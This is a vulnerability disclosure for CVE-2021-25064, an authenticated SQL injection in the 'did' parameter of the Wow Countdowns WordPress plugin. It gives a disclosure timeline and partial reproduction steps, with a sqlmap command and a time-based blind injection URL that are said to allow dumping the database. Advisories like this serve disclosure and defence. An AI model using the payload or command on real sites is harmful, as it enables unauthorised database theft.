Dec 10, 2021: Issue Identified and Disclosed to Wpscan (#5662), Got auto reply
Dec 14th, 2021: Got update that vendor had been contacted, CVE Assigned CVE-2021-25064
Dec 15th, 2021: Plugin version updated
Dec 22nd, 2021 : CVE Assigned CVE-2021-25064
January 18, 2022: Plugin closed
March 28, 2022: CVE Published in NVD
The Wow Countdowns plugin does not sanitize user input into the 'did' parameter and uses it in a SQL statement, leading to an authenticated SQL Injection
We can see the problematic code in \admin\partials\main.php
This vulnerability is present in the current version of the plugin 3.1.1. Administrative access is required to access the vulnerable functionality.
Link to plugin:
Steps to reproduce:
4. Click the delete link, the capture and save the request in an intercepting proxy.
5. Save the request to a file, request.txt
6. Run sqlmap
sqlmap -r request.txt -dbms=mysql --current-user -p did --batch --flush-session
https://test0.local/wp-admin/admin.php?page=mwp-countdown&info=del&did=1 AND (SELECT 5382 FROM SELECT(SLEEP(5)))PpNt)
Using this technique, we can dump the entire contents of the database, including WordPress users and so on.